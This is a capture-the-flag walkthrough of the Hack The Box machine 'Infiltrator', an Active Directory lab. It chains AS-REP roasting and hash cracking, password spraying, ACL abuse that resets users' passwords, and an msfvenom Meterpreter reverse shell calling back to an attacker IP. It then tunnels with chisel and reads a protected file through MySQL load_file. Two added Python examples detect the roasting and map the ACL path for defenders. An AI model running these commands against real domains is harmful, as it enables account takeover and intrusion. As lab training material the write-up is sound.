Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Infiltrator (Windows)
AS-REP roasting and an AD ACL abuse chain to reach m.harris, lateral movement to the Output Messenger server's MySQL instance, and extraction of the Administrator flag via load_file over an internal port.
Target
- IP: 10.10.11.31
Recon
sudo nmap -sC -sV 10.10.11.31 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-04 14:49:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-09-04T14:53:10+00:00; +2s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after: 2025-01-29T13:20:17
| MD5: be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-04T14:52:37+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
15220/tcp open unknown
15230/tcp open unknown
49667/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
49752/tcp open msrpc Microsoft Windows RPC
49839/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-04T14:52:37
|_ start_date: N/A
Add infiltrator.htb and dc01.infiltrator.htb to /etc/hosts.
Go to http://infiltrator.htb/.
There are some users listed:
- 01 David Anderson
- 02 Olivia Martinez
- 03 Kevin Turner
- 04 Amanda Walker
- 05 Marcus Harris
- 06 Lauren Clark
- 07 Ethan Rodriguez
Guess the first-initial.surname format and create users.txt:
d.anderson
o.martinez
k.turner
a.walker
m.harris
l.clark
e.rodriguez
./kerbrute -d infiltrator.htb --dc 10.10.11.31 userenum ./users.txt
2024/09/04 17:16:33 > [+] VALID USERNAME: d.anderson@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: o.martinez@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: m.harris@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: k.turner@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: a.walker@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: l.clark@infiltrator.htb
GetNPUsers.py infiltrator.htb/ -usersfile users.txt -outputfile out -dc-ip 10.10.11.31 -no-pass
We get:
$krb5asrep$23$l.clark@INFILTRATOR.HTB:471cbb143d21515b290a0892b64206c3$7327839792f4aef13fa3c291d2e63a9b1fec6d142854c44c9481eee8639cbe9b7fb08e88da499993a37e86941391481863b495342156d1fcf188e319ce5b7a6fa222c17b1d6764ceaae1d6cc535d81e7bfec70358326cda2d11a2be6cac6cf97143bd130c46dedb0b8353f6c3011c09fbd0ec75c701fa7fe6c4bd7bd575385ccc319064d7c3699becb76c57544716d74ed467e460b43c4282058fdd7d8470ead173892cb4e9ca0d6d301a6a61aaf19a42c360c840c365b805b1bd09240bfa5ee73e3e24a3c61c7943dcc650aed9ace8c2e9c080891c7e732f00a6af2526cad4178afd47ec6687391370e664a18f1e9d79601
Put it in a file named hash and crack it (mode 18200 is Kerberos 5 AS-REP etype 23; hashcat 6 also autodetects it from the $krb5asrep$23$ prefix):
hashcat -m 18200 -a 0 ./hash ./rockyou.txt
Recovered password:
WAT?watismypass!
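On the defender side, the TGT that GetNPUsers.py pulled is recorded in the DC's Security log as event 4768 with Pre-Authentication Type 0. The Python below is an added example, not part of this writeup, that scans a constructed key=value rendering of such events for no-preauth TGTs and marks the RC4 ones (etype 0x17, the $krb5asrep$23$ format) as the cheap-to-crack cases; real log exports need their own field extraction.

```python
# Added detection example (not from the original writeup): flag TGT requests
# in Windows Security event 4768 that were issued without Kerberos
# pre-authentication. Pre-Authentication Type 0 means the account has
# DONT_REQ_PREAUTH set; Ticket Encryption Type 0x17 (RC4-HMAC, etype 23) is
# the cheap-to-crack case behind the $krb5asrep$23$ hash above.
# The key=value rendering of the events below is constructed for this example.
import re
from collections import Counter

RC4_ETYPES = {0x17, 0x18}  # RC4-HMAC / RC4-HMAC-EXP: keyed by the NT hash, fast to crack

SAMPLE_4768 = """\
4768 TargetUserName=l.clark TargetDomainName=INFILTRATOR.HTB IpAddress=::ffff:10.10.16.27 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
4768 TargetUserName=d.anderson TargetDomainName=INFILTRATOR.HTB IpAddress=::ffff:10.10.16.27 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
4768 TargetUserName=k.turner TargetDomainName=INFILTRATOR.HTB IpAddress=::ffff:10.10.16.27 PreAuthType=0 TicketEncryptionType=0x17 Status=0x12
4768 TargetUserName=svc_backup TargetDomainName=INFILTRATOR.HTB IpAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x12 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_4768(line):
    """Return the fields of one constructed 4768 line as a dict, or None."""
    if not line.startswith("4768 "):
        return None
    return dict(FIELD_RE.findall(line[5:]))

def asrep_roast_candidates(log_text):
    """Successful TGTs issued with no pre-authentication. 'weak' marks RC4
    tickets, which crack orders of magnitude faster than AES ones."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_4768(line)
        if ev is None or ev.get("Status") != "0x0":  # failures issue no ticket
            continue
        if ev.get("PreAuthType") != "0":             # 0 = no pre-auth performed
            continue
        etype = int(ev["TicketEncryptionType"], 16)
        hits.append({"user": ev["TargetUserName"], "ip": ev["IpAddress"],
                     "etype": etype, "weak": etype in RC4_ETYPES})
    return hits

def requests_by_source(hits):
    """No-preauth TGTs per source IP: one host pulling many is enumeration."""
    return Counter(h["ip"] for h in hits)

if __name__ == "__main__":
    for h in asrep_roast_candidates(SAMPLE_4768):
        print(f"no-preauth TGT: {h['user']} from {h['ip']} etype=0x{h['etype']:x} weak={h['weak']}")
```

The fix on the account side is clearing DONT_REQ_PREAUTH on every flagged user; the remaining no-preauth accounts should at least be AES-only.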
crackmapexec smb infiltrator.htb -u users.txt -p 'WAT?watismypass!'
SMB infiltrator.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB infiltrator.htb 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
STATUS_ACCOUNT_RESTRICTION (unlike STATUS_LOGON_FAILURE) means the password was accepted but a logon restriction applies, so d.anderson and m.harris share l.clark's password; the restriction blocks the SMB logon, but the credential still works for LDAP collection and Kerberos below.
AD ACL Chain
bloodhound-python -u 'd.anderson' -p 'WAT?watismypass!' -ns 10.10.11.31 -d 'infiltrator.htb' -dc 'dc01.infiltrator.htb' -c All
sudo neo4j console
bloodhound --no-sandbox
Upload the collected JSON files, mark d.anderson as owned and check Shortest Paths to High Value Targets. See screenshot:
- attachments/s1.png
d.anderson has GenericAll over the Marketing Digital OU.
getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=d.anderson.ccache
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/dacledit.py
Edit this line in dacledit.py:
from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
to:
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
Download this file and place it in the same folder:
- https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py
python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb
[*] DACL modified successfully!
Marketing Digital contains the user e.rodriguez, and the inheritable FullControl ACE written above applies to that account, so d.anderson can now reset its password.
Download repository:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --kerberos --dc-ip 10.10.11.31 -u 'd.anderson' -p 'WAT?watismypass!' set password 'e.rodriguez' '!Kali12345678!'
[+] Password changed successfully!
crackmapexec smb infiltrator.htb -u e.rodriguez -p '!Kali12345678!'
SMB infiltrator.htb 445 DC01 [+] infiltrator.htb\e.rodriguez:!Kali12345678!
e.rodriguez has AddSelf over Chiefs Marketing.
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --dc-ip 10.10.11.31 -u 'e.rodriguez' -p '!Kali12345678!' add groupMember 'CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB' e.rodriguez
[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB
Chiefs Marketing has ForceChangePassword over m.harris.
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --dc-ip 10.10.11.31 -u 'e.rodriguez' -p '!Kali12345678!' set password m.harris '!Kali12345678!'
[+] Password changed successfully!
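The chain above is a four-hop path in the ACL graph. As an added example (not the writeup's or BloodHound's code), the Python below runs a BloodHound-style BFS over those edges, constructed here as data, and lists which single ACEs a defender would need to remove to cut the path; the set of rights treated as traversable is an assumption that mirrors how BloodHound handles them.

```python
# Added example, not part of the original writeup: a small BloodHound-style
# shortest-path search over ACL edges. The edge list is constructed from the
# relationships the walkthrough names (plus one filler edge); the traversal
# rule set is an assumption that mirrors how BloodHound treats these rights.
from collections import deque

EDGES = [
    ("d.anderson", "GenericAll", "OU=MARKETING DIGITAL"),
    ("OU=MARKETING DIGITAL", "Contains", "e.rodriguez"),
    ("e.rodriguez", "AddSelf", "CHIEFS MARKETING"),
    ("CHIEFS MARKETING", "ForceChangePassword", "m.harris"),
    ("l.clark", "MemberOf", "Domain Users"),  # constructed filler edge
]

# Rights whose holder can act on, or as, the target. Contains is only walked
# from an OU reached through a control edge (the GenericAll + inheritable ACE step).
TRAVERSABLE = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
               "AddMember", "AddSelf", "ForceChangePassword", "MemberOf", "Contains"}

def build_graph(edges):
    graph = {}
    for src, right, dst in edges:
        if right in TRAVERSABLE:
            graph.setdefault(src, []).append((right, dst))
    return graph

def shortest_path(edges, start, goal):
    """BFS; returns the hop list [(src, right, dst), ...] or None if unreachable."""
    graph, prev, queue = build_graph(edges), {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops, cur = [], node
            while prev[cur] is not None:
                parent, right = prev[cur]
                hops.append((parent, right, cur))
                cur = parent
            return hops[::-1]
        for right, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, right)
                queue.append(nxt)
    return None

def critical_edges(edges, start, goal):
    """ACEs whose removal alone disconnects start from goal: the defender's
    minimal remediation list (every hop of a single unbranched path)."""
    return [e for e in edges
            if shortest_path([x for x in edges if x != e], start, goal) is None]
```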
getTGT.py 'infiltrator.htb/m.harris:!Kali12345678!' -dc-ip dc01.infiltrator.htb
[*] Saving ticket in m.harris.ccache
export KRB5CCNAME=m.harris.ccache
Edit /etc/krb5.conf:
sudo vim /etc/krb5.conf
Add the realm under the [realms] section:
INFILTRATOR.HTB = {
kdc = dc01.infiltrator.htb
admin_server = infiltrator.htb
default_domain = infiltrator.htb
}
evil-winrm -i 10.10.11.31 -u m.harris -r INFILTRATOR.HTB
We get a PowerShell shell as m.harris.
Lateral Movement to Output Messenger DB
To obtain a Meterpreter shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.27 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to the target.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
.\reverse.exe
We get a reverse Meterpreter session.
shell
cd \ProgramData
dir
We see the Output Messenger and Output Messenger Server directories.
dir "Output Messenger Server\Temp"
We notice:
OutputMessengerMysql.zip
From meterpreter:
set_timeouts -x 99999999
download OutputMessengerMysql.zip
Unzip it.
cat OutputMysql.ini
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
cd settings
cat my.ini
We find:
password=ibWijteig5
Download chisel:
- https://github.com/jpillora/chisel
Upload the chisel Windows binary to the target.
./chisel_linux server --port 8000 --reverse
.\chisel_windows.exe client http://10.10.16.27:8000 R:127.0.0.1:14406:127.0.0.1:14406
mysql -h 127.0.0.1 -P 14406 -u root -p
Use password:
ibWijteig5
select load_file('C:/Users/Administrator/Desktop/root.txt');
Use forward slashes or doubled backslashes: a lone backslash starts a MySQL escape sequence, so \r in \root.txt would become a carriage return. load_file() silently returns NULL when the server process cannot read the file, the account lacks the FILE privilege, or secure_file_priv restricts the directory; the read succeeds here only because none of those apply.